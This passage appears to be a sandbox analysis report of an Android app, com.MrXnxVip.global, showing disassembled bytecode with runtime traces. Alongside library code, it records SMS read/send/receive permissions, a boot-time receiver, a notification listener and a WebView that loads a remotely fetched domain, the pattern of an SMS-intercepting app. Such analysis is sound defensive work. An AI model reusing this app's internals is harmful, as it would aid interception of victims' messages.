                        36invoke-virtual {v2, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        38invoke-interface {v0}, Lanywheresoftware/b4a/BA$ShortName;->value()Ljava/lang/String;
                        • Time: 824950
                          • This:
                            • @anywheresoftware.b4a.BA$ShortName(value=Intent)
                          • Return:
                            • java.lang.String@62d8a20
                        39move-result-object v0
                        41invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        43const-string v0, ")."
                        45invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        47invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        48move-result-object v0
                        49try_start_3d:
                        50const-string v1, "anywheresoftware.b4a.objects.ViewWrapper"
                        52invoke-static {v1}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
                        53move-result-object v1
                        55invoke-virtual {v1, p0}, Ljava/lang/Class;->isInstance(Ljava/lang/Object;)Z
                        56move-result v1
                        57if-eqz v1, :cond_64
                        58sget-boolean v1, Lanywheresoftware/b4a/AbsObjectWrapper;->Activity_LoadLayout_Was_Called:Z
                        59if-nez v1, :cond_64
                        60new-instance v1, Ljava/lang/StringBuilder;
                        62invoke-static {v0}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
                        63move-result-object v2
                        65invoke-direct {v1, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        67const-string v2, "\nDid you forget to call Activity.LoadLayout?"
                        69invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        71invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        72move-result-object v0
                        73try_end_5f: goto/16 :goto_64
                        74catch_60: move-exception v1
                        76invoke-virtual {v1}, Ljava/lang/ClassNotFoundException;->printStackTrace()V
                        77goto_64: new-instance v1, Ljava/lang/RuntimeException;
                        79invoke-direct {v1, v0}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/String;)V
                        80throw v1
                        81cond_6a: return-object v0
                        Cross References
                        APIs
                        • java.util.ArrayList.<init>
                        • java.util.Collection.add
                        • java.util.Collection.toArray
                        • java.util.Arrays.copyOf
                        • java.lang.NullPointerException.<init>
                        • java.lang.Object.toString
                        • java.lang.IllegalArgumentException.<init>
                        Strings
                        • cipherSuites
                        • SSL_RSA_WITH_3DES_EDE_CBC_SHA
                        • TLS_AES_128_GCM_SHA256
                        • TLS_AES_256_GCM_SHA384
                        • TLS_CHACHA20_POLY1305_SHA256
                        • TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
                        • TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
                        • TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
                        • TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
                        • TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
                        • TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
                        • TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
                        • TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256
                        • TLS_RSA_WITH_AES_128_CBC_SHA
                        • TLS_RSA_WITH_AES_128_GCM_SHA256
                        • TLS_RSA_WITH_AES_256_CBC_SHA
                        • TLS_RSA_WITH_AES_256_GCM_SHA384
                        • null cannot be cast to non-null type kotlin.Array<T>
                        • no cipher suites for cleartext connections
                        Position Instruction Meta Information
                        1const-string v0, "cipherSuites"
                        3invoke-static {p1, v0}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullParameter(Ljava/lang/Object;Ljava/lang/String;)V
                        4move-object v0, p0
                        5check-cast v0, Lokhttp3/ConnectionSpec$Builder;
                        6iget-boolean v1, v0, Lokhttp3/ConnectionSpec$Builder;->tls:Z
                        7if-eqz v1, :cond_47
                        8new-instance v1, Ljava/util/ArrayList;
                        9array-length v2, p1
                        11invoke-direct {v1, v2}, Ljava/util/ArrayList;-><init>(I)V
                        12check-cast v1, Ljava/util/Collection;
                        13array-length v2, p1
                        14const/4 v3, 0x0
                        15const/4 v4, 0x0
                        16goto_17: if-ge v4, v2, :cond_25
                        17aget-object v5, p1, v4
                        19invoke-virtual {v5}, Lokhttp3/CipherSuite;->javaName()Ljava/lang/String;
                        • Time: 696984
                          • This:
                            • TLS_AES_128_GCM_SHA256
                          • Return:
                            • TLS_AES_128_GCM_SHA256
                        • Time: 696985
                          • This:
                            • TLS_AES_256_GCM_SHA384
                          • Return:
                            • TLS_AES_256_GCM_SHA384
                        • Time: 696987
                          • This:
                            • TLS_CHACHA20_POLY1305_SHA256
                          • Return:
                            • TLS_CHACHA20_POLY1305_SHA256
                        • Time: 696990
                          • This:
                            • TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
                          • Return:
                            • TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
                        • Time: 696994
                          • This:
                            • TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
                          • Return:
                            • TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
                        • Time: 697009
                          • This:
                            • TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
                          • Return:
                            • TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
                        • Time: 697011
                          • This:
                            • TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
                          • Return:
                            • TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
                        • Time: 697013
                          • This:
                            • TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
                          • Return:
                            • TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
                        • Time: 697017
                          • This:
                            • TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256
                          • Return:
                            • TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256
                        • Time: 697035
                          • This:
                            • TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
                          • Return:
                            • TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
                        • Time: 697037
                          • This:
                            • TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
                          • Return:
                            • TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
                        • Time: 697040
                          • This:
                            • TLS_RSA_WITH_AES_128_GCM_SHA256
                          • Return:
                            • TLS_RSA_WITH_AES_128_GCM_SHA256
                        • Time: 697041
                          • This:
                            • TLS_RSA_WITH_AES_256_GCM_SHA384
                          • Return:
                            • TLS_RSA_WITH_AES_256_GCM_SHA384
                        • Time: 697042
                          • This:
                            • TLS_RSA_WITH_AES_128_CBC_SHA
                          • Return:
                            • TLS_RSA_WITH_AES_128_CBC_SHA
                        • Time: 697043
                          • This:
                            • TLS_RSA_WITH_AES_256_CBC_SHA
                          • Return:
                            • TLS_RSA_WITH_AES_256_CBC_SHA
                        • Time: 697044
                          • This:
                            • SSL_RSA_WITH_3DES_EDE_CBC_SHA
                          • Return:
                            • SSL_RSA_WITH_3DES_EDE_CBC_SHA
                        20move-result-object v5
                        22invoke-interface {v1, v5}, Ljava/util/Collection;->add(Ljava/lang/Object;)Z
                        23add-int/lit8 v4, v4, 0x1
                        24goto/16 :goto_17
                        25cond_25: check-cast v1, Ljava/util/List;
                        26check-cast v1, Ljava/util/Collection;
                        27new-array p1, v3, [Ljava/lang/String;
                        29invoke-interface {v1, p1}, Ljava/util/Collection;->toArray([Ljava/lang/Object;)[Ljava/lang/Object;
                        30move-result-object p1
                        31if-eqz p1, :cond_3f
                        32check-cast p1, [Ljava/lang/String;
                        33array-length v1, p1
                        35invoke-static {p1, v1}, Ljava/util/Arrays;->copyOf([Ljava/lang/Object;I)[Ljava/lang/Object;
                        36move-result-object p1
                        37check-cast p1, [Ljava/lang/String;
                        39invoke-virtual {v0, p1}, Lokhttp3/ConnectionSpec$Builder;->cipherSuites([Ljava/lang/String;)Lokhttp3/ConnectionSpec$Builder;
                        40move-result-object p1
                        41return-object p1
                        42cond_3f: new-instance p1, Ljava/lang/NullPointerException;
                        44const-string v0, "null cannot be cast to non-null type kotlin.Array<T>"
                        46invoke-direct {p1, v0}, Ljava/lang/NullPointerException;-><init>(Ljava/lang/String;)V
                        47throw p1
                        48cond_47: new-instance p1, Ljava/lang/IllegalArgumentException;
                        50const-string v0, "no cipher suites for cleartext connections"
                        52invoke-virtual {v0}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        53move-result-object v0
                        55invoke-direct {p1, v0}, Ljava/lang/IllegalArgumentException;-><init>(Ljava/lang/String;)V
                        56check-cast p1, Ljava/lang/Throwable;
                        57goto/16 :goto_56
                        58goto_55: throw p1
                        59goto_56: goto/16 :goto_55
                        APIs
                        Strings
                        • SSL_RSA_WITH_3DES_EDE_CBC_SHA
                        • TLS_AES_128_GCM_SHA256
                        • TLS_AES_256_GCM_SHA384
                        • TLS_CHACHA20_POLY1305_SHA256
                        • TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
                        • TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
                        • TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
                        • TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
                        • TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
                        • TLS_ECDHE_PSK_WITH_AES_128_CBC_SHA
                        • TLS_ECDHE_PSK_WITH_AES_256_CBC_SHA
                        • TLS_ECDHE_PSK_WITH_CHACHA20_POLY1305_SHA256
                        • TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
                        • TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
                        • TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
                        • TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
                        • TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256
                        • TLS_EMPTY_RENEGOTIATION_INFO_SCSV
                        • TLS_FALLBACK_SCSV
                        • TLS_PSK_WITH_AES_128_CBC_SHA
                        • TLS_PSK_WITH_AES_256_CBC_SHA
                        • TLS_RSA_WITH_AES_128_CBC_SHA
                        • TLS_RSA_WITH_AES_128_GCM_SHA256
                        • TLS_RSA_WITH_AES_256_CBC_SHA
                        • TLS_RSA_WITH_AES_256_GCM_SHA384
                        Position Instruction Meta Information
                        0check-cast p1, Ljava/lang/String;
                        1check-cast p2, Ljava/lang/String;
                        3invoke-virtual {p0, p1, p2}, Lokhttp3/CipherSuite$Companion$ORDER_BY_NAME$1;->compare(Ljava/lang/String;Ljava/lang/String;)I
                        • Time: 698111
                          • This:
                            • okhttp3.CipherSuite$Companion$ORDER_BY_NAME$1@e673f86
                          • p0: TLS_AES_128_GCM_SHA256
                          • p1: TLS_AES_128_GCM_SHA256
                          • Return:
                            • 0
                        • Time: 698116
                          • This:
                            • okhttp3.CipherSuite$Companion$ORDER_BY_NAME$1@e673f86
                          • p0: TLS_AES_256_GCM_SHA384
                          • p1: TLS_AES_128_GCM_SHA256
                          • Return:
                            • 1
                        • Time: 698118
                          • This:
                            • okhttp3.CipherSuite$Companion$ORDER_BY_NAME$1@e673f86
                          • p0: TLS_AES_256_GCM_SHA384
                          • p1: TLS_AES_256_GCM_SHA384
                          • Return:
                            • 0
                        • Time: 698120
                          • This:
                            • okhttp3.CipherSuite$Companion$ORDER_BY_NAME$1@e673f86
                          • p0: TLS_CHACHA20_POLY1305_SHA256
                          • p1: TLS_AES_128_GCM_SHA256
                          • Return:
                            • 1
                        • Time: 698143
                          • This:
                            • okhttp3.CipherSuite$Companion$ORDER_BY_NAME$1@e673f86
                          • p0: TLS_CHACHA20_POLY1305_SHA256
                          • p1: TLS_AES_256_GCM_SHA384
                          • Return:
                            • 1
                        • Time: 698149
                          • This:
                            • okhttp3.CipherSuite$Companion$ORDER_BY_NAME$1@e673f86
                          • p0: TLS_CHACHA20_POLY1305_SHA256
                          • p1: TLS_CHACHA20_POLY1305_SHA256
                          • Return:
                            • 0
                        • Time: 698150
                          • This:
                            • okhttp3.CipherSuite$Companion$ORDER_BY_NAME$1@e673f86
                          • p0: TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
                          • p1: TLS_AES_128_GCM_SHA256
                          • Return:
                            • 1
                        • Time: 698151
                          • This:
                            • okhttp3.CipherSuite$Companion$ORDER_BY_NAME$1@e673f86
                          • p0: TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
                          • p1: TLS_AES_256_GCM_SHA384
                          • Return:
                            • 1
                        • Time: 698153
                          • This:
                            • okhttp3.CipherSuite$Companion$ORDER_BY_NAME$1@e673f86
                          • p0: TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
                          • p1: TLS_CHACHA20_POLY1305_SHA256
                          • Return:
                            • 1
                        • Time: 698179
                          • This:
                            • okhttp3.CipherSuite$Companion$ORDER_BY_NAME$1@e673f86
                          • p0: TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
                          • p1: TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
                          • Return:
                            • 0
                        • Time: 698188
                          • This:
                            • okhttp3.CipherSuite$Companion$ORDER_BY_NAME$1@e673f86
                          • p0: TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
                          • p1: TLS_AES_128_GCM_SHA256
                          • Return:
                            • 1
                        • Time: 698260
                          • This:
                            • okhttp3.CipherSuite$Companion$ORDER_BY_NAME$1@e673f86
                          • p0: TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
                          • p1: TLS_AES_256_GCM_SHA384
                          • Return:
                            • 1
                        • Time: 698268
                          • This:
                            • okhttp3.CipherSuite$Companion$ORDER_BY_NAME$1@e673f86
                          • p0: TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
                          • p1: TLS_CHACHA20_POLY1305_SHA256
                          • Return:
                            • 1
                        • Time: 698273
                          • This:
                            • okhttp3.CipherSuite$Companion$ORDER_BY_NAME$1@e673f86
                          • p0: TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
                          • p1: TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
                          • Return:
                            • 1
                        • Time: 698275
                          • This:
                            • okhttp3.CipherSuite$Companion$ORDER_BY_NAME$1@e673f86
                          • p0: TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
                          • p1: TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
                          • Return:
                            • -1
                        • Time: 698278
                          • This:
                            • okhttp3.CipherSuite$Companion$ORDER_BY_NAME$1@e673f86
                          • p0: TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
                          • p1: TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
                          • Return:
                            • 0
                        • Time: 698296
                          • This:
                            • okhttp3.CipherSuite$Companion$ORDER_BY_NAME$1@e673f86
                          • p0: TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
                          • p1: TLS_AES_128_GCM_SHA256
                          • Return:
                            • 1
                        • Time: 698358
                          • This:
                            • okhttp3.CipherSuite$Companion$ORDER_BY_NAME$1@e673f86
                          • p0: TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
                          • p1: TLS_AES_256_GCM_SHA384
                          • Return:
                            • 1
                        • Time: 698360
                          • This:
                            • okhttp3.CipherSuite$Companion$ORDER_BY_NAME$1@e673f86
                          • p0: TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
                          • p1: TLS_CHACHA20_POLY1305_SHA256
                          • Return:
                            • 1
                        • Time: 698361
                          • This:
                            • okhttp3.CipherSuite$Companion$ORDER_BY_NAME$1@e673f86
                          • p0: TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
                          • p1: TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
                          • Return:
                            • 1
                        • 173 additional calls hidden ...
                        4move-result p1
                        5return p1
                        Cross References
                        APIs
                        • java.lang.String.equals
                        • anywheresoftware.b4a.objects.NotificationListenerWrapper.getSbnFromIntent
                        • java.lang.String.equals
                        • java.lang.String.valueOf
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.String.equals
                        • java.lang.String.valueOf
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • java.lang.String@565aa2
                        • java.lang.String@62d8a20
                        • java.lang.String@649a5c4
                        • java.lang.String@7aed657
                        • android.intent.action.BOOT_COMPLETED
                        • b4a_notificationlistener
                        • event
                        • posted
                        • _notificationposted
                        • removed
                        • _notificationremoved
                        Position Instruction Meta Information
                        1invoke-virtual {p1}, Lanywheresoftware/b4a/objects/IntentWrapper;->IsInitialized()Z
                        • Time: 812216
                          • This:
                            • (Intent) Intent { act=android.intent.action.BOOT_COMPLETED }
                          • Return:
                            • java.lang.String@649a5c4
                        • Time: 812401
                          • This:
                            • (Intent) Intent { cmp=com.MrXnxVip.global/.pnservices }
                          • Return:
                            • java.lang.String@565aa2
                        • Time: 824770
                          • This:
                            • (Intent) Not initialized
                          • Return:
                            • java.lang.Class@9fff787
                            • getName: anywheresoftware.b4a.objects.IntentWrapper
                        • Time: 824771
                          • This:
                            • $Proxy2@a1313d6
                          • Return:
                            • java.lang.String@62d8a20
                        • Time: 824773
                          • This:
                            • (Intent) Not initialized
                          • Return:
                            • java.lang.String@7aed657
                        • Time: 824770
                          • This:
                            • (Intent) Not initialized
                          • Return:
                            • false
                        2move-result v0
                        3const/4 v1, 0x0
                        4if-nez v0, :cond_8
                        5return v1
                        6cond_8:
                        7invoke-virtual {p1}, Lanywheresoftware/b4a/objects/IntentWrapper;->getAction()Ljava/lang/String;
                        • Time: 812221
                          • This:
                            • (Intent) Intent { act=android.intent.action.BOOT_COMPLETED }
                          • Return:
                            • android.intent.action.BOOT_COMPLETED
                        8move-result-object v0
                        10const-string v2, "b4a_notificationlistener"
                        12invoke-virtual {v0, v2}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        13move-result v0
                        14if-eqz v0, :cond_85
                        16const-string v0, "event"
                        18invoke-virtual {p1, v0}, Lanywheresoftware/b4a/objects/IntentWrapper;->GetExtra(Ljava/lang/String;)Ljava/lang/Object;
                        19move-result-object v0
                        20check-cast v0, Ljava/lang/String;
                        22invoke-virtual {p1}, Lanywheresoftware/b4a/objects/IntentWrapper;->getObject()Ljava/lang/Object;
                        23move-result-object p1
                        24check-cast p1, Landroid/content/Intent;
                        26invoke-static {p1}, Lanywheresoftware/b4a/objects/NotificationListenerWrapper;->getSbnFromIntent(Landroid/content/Intent;)Landroid/service/notification/StatusBarNotification;
                        27move-result-object p1
                        29const-string v2, "posted"
                        31invoke-virtual {v0, v2}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        32move-result v2
                        33const/4 v3, 0x1
                        34if-eqz v2, :cond_56
                        36iget-object v0, p0, Lanywheresoftware/b4a/objects/NotificationListenerWrapper$NotificationListener;->ba:Lanywheresoftware/b4a/BA;
                        37new-instance v2, Ljava/lang/StringBuilder;
                        39iget-object v4, p0, Lanywheresoftware/b4a/objects/NotificationListenerWrapper$NotificationListener;->eventName:Ljava/lang/String;
                        41invoke-static {v4}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
                        42move-result-object v4
                        44invoke-direct {v2, v4}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        46const-string v4, "_notificationposted"
                        48invoke-virtual {v2, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        50invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        51move-result-object v2
                        52new-array v4, v3, [Ljava/lang/Object;
                        53new-instance v5, Lanywheresoftware/b4a/objects/NotificationListenerWrapper$StatusBarNotificationWrapper;
                        55invoke-direct {v5}, Lanywheresoftware/b4a/objects/NotificationListenerWrapper$StatusBarNotificationWrapper;-><init>()V
                        57invoke-static {v5, p1}, Lanywheresoftware/b4a/AbsObjectWrapper;->ConvertToWrapper(Lanywheresoftware/b4a/ObjectWrapper;Ljava/lang/Object;)Lanywheresoftware/b4a/ObjectWrapper;
                        58move-result-object p1
                        59aput-object p1, v4, v1
                        61invoke-virtual {v0, p0, v2, v4}, Lanywheresoftware/b4a/BA;->raiseEvent(Ljava/lang/Object;Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/Object;
                        62goto/16 :goto_84
                        63cond_56:
                        64const-string v2, "removed"
                        66invoke-virtual {v0, v2}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        67move-result v0
                        68if-eqz v0, :cond_84
                        70iget-object v0, p0, Lanywheresoftware/b4a/objects/NotificationListenerWrapper$NotificationListener;->ba:Lanywheresoftware/b4a/BA;
                        71new-instance v2, Ljava/lang/StringBuilder;
                        73iget-object v4, p0, Lanywheresoftware/b4a/objects/NotificationListenerWrapper$NotificationListener;->eventName:Ljava/lang/String;
                        75invoke-static {v4}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
                        76move-result-object v4
                        78invoke-direct {v2, v4}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        80const-string v4, "_notificationremoved"
                        82invoke-virtual {v2, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        84invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        85move-result-object v2
                        86new-array v4, v3, [Ljava/lang/Object;
                        87new-instance v5, Lanywheresoftware/b4a/objects/NotificationListenerWrapper$StatusBarNotificationWrapper;
                        89invoke-direct {v5}, Lanywheresoftware/b4a/objects/NotificationListenerWrapper$StatusBarNotificationWrapper;-><init>()V
                        91invoke-static {v5, p1}, Lanywheresoftware/b4a/AbsObjectWrapper;->ConvertToWrapper(Lanywheresoftware/b4a/ObjectWrapper;Ljava/lang/Object;)Lanywheresoftware/b4a/ObjectWrapper;
                        92move-result-object p1
                        93aput-object p1, v4, v1
                        95invoke-virtual {v0, p0, v2, v4}, Lanywheresoftware/b4a/BA;->raiseEvent(Ljava/lang/Object;Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/Object;
                        96goto_84: return v3
                        97cond_85: return v1
                        Cross References
                        APIs
                        • java.lang.Integer.intValue
                        • com.MrXnxVip.global.main.mostCurrent:Lcom/MrXnxVip/global/main
                        • com.MrXnxVip.global.main._webview1:Lanywheresoftware/b4a/objects/WebViewWrapper
                        • com.MrXnxVip.global.main._vvvvvvvvvv6:Lanywheresoftware/b4a/objects/B4XViewWrapper$XUI
                        • com.MrXnxVip.global.main.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.main.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.main.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.main.mostCurrent:Lcom/MrXnxVip/global/main
                        • com.MrXnxVip.global.main._vvvvvvvvv7:Lcom/MrXnxVip/global/starter
                        • com.MrXnxVip.global.starter.getObject
                        • com.MrXnxVip.global.main.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.main.mostCurrent:Lcom/MrXnxVip/global/main
                        • com.MrXnxVip.global.main._vvvvvvvvv0:Lcom/MrXnxVip/global/firebasemessaging
                        • com.MrXnxVip.global.firebasemessaging.getObject
                        • com.MrXnxVip.global.main.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.main.mostCurrent:Lcom/MrXnxVip/global/main
                        • com.MrXnxVip.global.main._vvvvvvvvvv1:Lcom/MrXnxVip/global/newmessage1
                        • com.MrXnxVip.global.newmessage1.getObject
                        • com.MrXnxVip.global.main.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.main.getObject
                        • java.lang.StringBuilder.<init>
                        • com.MrXnxVip.global.main.mostCurrent:Lcom/MrXnxVip/global/main
                        • com.MrXnxVip.global.main._vvvvvvvvvv3:Lcom/MrXnxVip/global/information
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • com.MrXnxVip.global.main.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.main._vvvvvvvvvv5
                        • com.MrXnxVip.global.main.mostCurrent:Lcom/MrXnxVip/global/main
                        • com.MrXnxVip.global.main.activityBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.main._vvvv0:Lanywheresoftware/b4a/objects/RuntimePermissions
                        • com.MrXnxVip.global.main.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.main._vvvv0:Lanywheresoftware/b4a/objects/RuntimePermissions
                        • com.MrXnxVip.global.main._vvvv0:Lanywheresoftware/b4a/objects/RuntimePermissions
                        • com.MrXnxVip.global.main.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.main._vvvv0:Lanywheresoftware/b4a/objects/RuntimePermissions
                        • com.MrXnxVip.global.main._vvvv0:Lanywheresoftware/b4a/objects/RuntimePermissions
                        • com.MrXnxVip.global.main.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.main._vvvv0:Lanywheresoftware/b4a/objects/RuntimePermissions
                        • com.MrXnxVip.global.main.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.main.mostCurrent:Lcom/MrXnxVip/global/main
                        • com.MrXnxVip.global.main._vvvvvvvvv7:Lcom/MrXnxVip/global/starter
                        • com.MrXnxVip.global.starter.getObject
                        • com.MrXnxVip.global.main.mostCurrent:Lcom/MrXnxVip/global/main
                        • com.MrXnxVip.global.main._activity:Lanywheresoftware/b4a/objects/ActivityWrapper
                        • com.MrXnxVip.global.main.mostCurrent:Lcom/MrXnxVip/global/main
                        • com.MrXnxVip.global.main.activityBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.main.processBA:Lanywheresoftware/b4a/BA
                        Strings
                        • \u062f\u0633\u062a\u06af\u0627\u0647 \u0628\u0647 \u0627\u06cc\u0646\u062a\u0631\u0646\u062a \u0645\u062a\u0635\u0644 \u0646\u0645\u06cc\u0628\u0627\u0634\u062f.
                        • \u062e\u0637\u0627
                        • msgbox_result
                        • job1
                        • /web.txt
                        • jobdone
                        • 6196617
                        • android.permission.RECEIVE_SMS
                        • android.permission.SEND_SMS
                        • android.permission.READ_SMS
                        • Layout
                        • 6196611
                        • create
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Ljava/lang/Exception;
                        3}
                        4.end annotation
                        5cond_0: iget p1, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->state:I
                        6const/4 v0, 0x0
                        7const/4 v1, 0x5
                        8const/16 v2, 0xe
                        9const/16 v3, 0xb
                        10const/4 v4, 0x6
                        11const/16 v5, 0xf
                        12const/4 v6, 0x0
                        13packed-switch p1, :pswitch_data_16a
                        14pswitch_f: goto/16 :goto_0
                        15pswitch_10: iput v3, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->state:I
                        16aget-object p1, p2, v6
                        17check-cast p1, Ljava/lang/Integer;
                        19invoke-virtual {p1}, Ljava/lang/Integer;->intValue()I
                        20move-result p1
                        21iput p1, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->_res:I
                        22goto/16 :goto_0
                        23pswitch_1d: iput v5, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->state:I
                        24aget-object p1, p2, v6
                        25check-cast p1, Lcom/MrXnxVip/global/httpjob;
                        26iput-object p1, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->_job:Lcom/MrXnxVip/global/httpjob;
                        28invoke-virtual {p1}, Lcom/MrXnxVip/global/httpjob;->_vvvvvv5()Ljava/lang/String;
                        29move-result-object p1
                        30iput-object p1, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->_domain:Ljava/lang/String;
                        32sget-object p1, Lcom/MrXnxVip/global/main;->mostCurrent:Lcom/MrXnxVip/global/main;
                        34iget-object p1, p1, Lcom/MrXnxVip/global/main;->_webview1:Lanywheresoftware/b4a/objects/WebViewWrapper;
                        36iget-object v0, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->_domain:Ljava/lang/String;
                        38invoke-virtual {p1, v0}, Lanywheresoftware/b4a/objects/WebViewWrapper;->LoadUrl(Ljava/lang/String;)V
                        39goto/16 :goto_0
                        40pswitch_35: const/4 p1, -0x1
                        41iput p1, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->state:I
                        42goto/16 :goto_0
                        43pswitch_39: iput v5, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->state:I
                        44goto/16 :goto_0
                        45pswitch_3c: iput v2, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->state:I
                        47invoke-static {}, Lanywheresoftware/b4a/keywords/Common;->ExitApplication()V
                        48goto/16 :goto_0
                        49pswitch_42: iput v2, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->state:I
                        50iget p1, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->_res:I
                        51const/16 v0, -0xa
                        52if-le p1, v0, :cond_0
                        53const/16 p1, 0xd
                        54iput p1, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->state:I
                        55goto/16 :goto_0
                        56pswitch_4f: iput v3, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->state:I
